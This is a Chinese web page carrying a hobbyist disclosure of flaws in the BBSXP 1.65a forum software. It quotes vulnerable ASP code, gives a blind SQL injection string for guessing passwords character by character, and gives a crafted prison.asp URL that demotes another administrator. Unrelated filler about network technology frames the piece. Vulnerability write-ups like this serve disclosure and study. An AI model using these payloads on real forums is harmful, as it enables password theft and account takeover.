|
導讀網(wǎng)絡技術是從1990年代中期發(fā)展起來的新技術,它把互聯(lián)網(wǎng)上分散的資源融為有機整體,實現(xiàn)資源的全面共享和有機協(xié)作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數(shù)據(jù)... 網(wǎng)絡技術是從1990年代中期發(fā)展起來的新技術,它把互聯(lián)網(wǎng)上分散的資源融為有機整體,實現(xiàn)資源的全面共享和有機協(xié)作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數(shù)據(jù)資源、信息資源、知識資源、專家資源、大型數(shù)據(jù)庫、網(wǎng)絡、傳感器等。 當前的互聯(lián)網(wǎng)只限于信息共享,網(wǎng)絡則被認為是互聯(lián)網(wǎng)發(fā)展的第三階段。 最新BBSXP漏洞[倒著看三]其實躺在床上看代碼也是一件非常愜意的事情,特別是看那些寫得很爛的東西時候, 你總莫名其妙地產(chǎn)生一種居高臨下的感覺。在過了一個痛苦不堪的暑假后,尤其是在生病 后急需要調整心情的那段時間里,看BBSXP幾乎成了我唯一的享受。 依然是BBSXP1.65a,依然是業(yè)余級別的代碼和洞。 recycle.asp行16、17。這是一個要管理員或者社區(qū)區(qū)長才能利用漏洞,代碼如下: for each ho in request.form("id") conn.execute("update [forum] set deltopic=0,lasttime=now,content=content&'<br><br>[此帖子已 被 "&Request.Cookies("username")&" 在 "&now&" 還原過]' where id="&ho&" and deltopic=1") next 對于MSSQL版(如果地球上存在的話)的來說,這個的利用難度是零。但是對于 ACCESS版的要利用這個猜密碼玩的話,難度是很大的,因為不好判斷條件正確與否,姑且 就把這個洞的利用放掉吧。 prison.asp行28同樣是一個要管理員或者社區(qū)區(qū)長才能利用漏洞,代碼是這樣的: sql="select * from user where username='"&Request("username")&"'" 我把這個洞稱作愚蠢的,第一是因為幼稚的寫法,第二是因為在這個爾虞我詐的社 會,你永遠不知道同樣身為管理員的他是否會在背后捅你一刀,輕率地寫那些只有管理員 才有權訪問的代碼,同樣會增加整個論壇的脆弱性。 一句老話,對于MSSQL版(如果地球上確實存在的話)的來說,這個的利用難度是零, 而對于準備猜密碼的人來說,難度就像是讓中國跳水隊在一米板上做301B。 進入prison.asp,用戶名上面填寫的就是我們要注入的東西,理由隨便。比如我們來 猜猜never的密碼,當然,我自己是知道的密碼的,這里只是假裝不知道。 要填寫的東西基本上就不用考慮,猜never的密碼第一位最好的格式是這樣: select * from user where username='never' and right(left(userpass,1),1) ='x' 比較一下prison.asp第28行,簡直就是量身定做,提交的用戶名就這樣就好了 never' and right(left(userpass,1),1)='x never的密碼第一位是1,我提交的不正確的話,比如提交的就是never' and right (left(userpass,1),1)='2,那么BBSXP會傻乎乎的告訴我這個用戶資料不存在,呵呵, 很顯然,這個的查詢結果是空,當然沒有資料存在了。如果我猜的不是2而是1,回來的資 料就不太一樣,這里never是社區(qū)社長,不能被關進監(jiān)獄,因為這個查詢結果正好就是 never,所以BBSXP告訴我們不能抓入監(jiān)獄。當然,猜不同的人的密碼情況可能不太一樣, 反正如果返回結果是用戶資料不存在,你就是猜錯了,否則你就猜對了。 同樣的洞在同樣的文件中有很多個拷貝,我就不一一列舉了,下面再說一個搞笑的漏 洞。 同樣的文件,行71到89是這樣的 if Request("menu")="release" then sql="select * from user where username='"&Request.Cookies("username")&"'" rs.Open sql,Conn if rs("membercode") < 4 then error("<li>您的權限不夠,無法釋放犯人!") end if if Request.Cookies("userpass")<>rs("userpass") then error("<li>您的密碼錯誤") end if rs.close conn.execute("update [user] set membercode=1 where username='"&Request ("username")&"'") conn.execute("delete from [prison] where username='"&Request("username") &"'") response.redirect "prison.asp" end if 我為什么要說怕別人在背后擺你一道呢,就是這里了。我要是管理員,我可以讓任何 人進監(jiān)獄!這里沒有檢查要釋放的人是不是在監(jiān)獄里面,我要是弄了一個不是在監(jiān)獄里面 的人提交過去,馬上就把他打為平民了,因為有這句話: conn.execute("update [user] set membercode=1 where username='"&Request ("username")&"'") 比如我是never,test是管理員,但是我很看不慣它這個小子。我登陸后在瀏覽器中 輸入 http://localhost/bbsxp/prison.asp?menu=release&username=test 咔嚓,test變成平頭老百姓了,然后我按照正常的手段就可以把他弄進監(jiān)獄里面去。 哦,可憐的test,他還不知道世道如此險惡。 總而言之,這個論壇是極其搞笑的,任何的自夸之語只能授人以笑柄。什么叫“一般 你只要自己設置一下,不用升級我們的程序,你就可以永遠排除這種漏洞”,我都不好意 思讀出來,就是這樣的論壇,這樣的代碼,就是猴子聽了都會臉紅。后面一個漏洞充分的 體現(xiàn)了編寫者的思維混亂,我都不能說他們是外行,因為我身邊的非計算機系DDMM們才大 一大二,他們都有嚴謹?shù)乃季S方式,而且寫出來的代碼簡潔有力,我怕這樣說會傷了DDMM 們的心,他們才是真正的外行啊!BBSXP的人呢?你們算是什么呢? 網(wǎng)絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網(wǎng)絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發(fā)展,這正是網(wǎng)絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!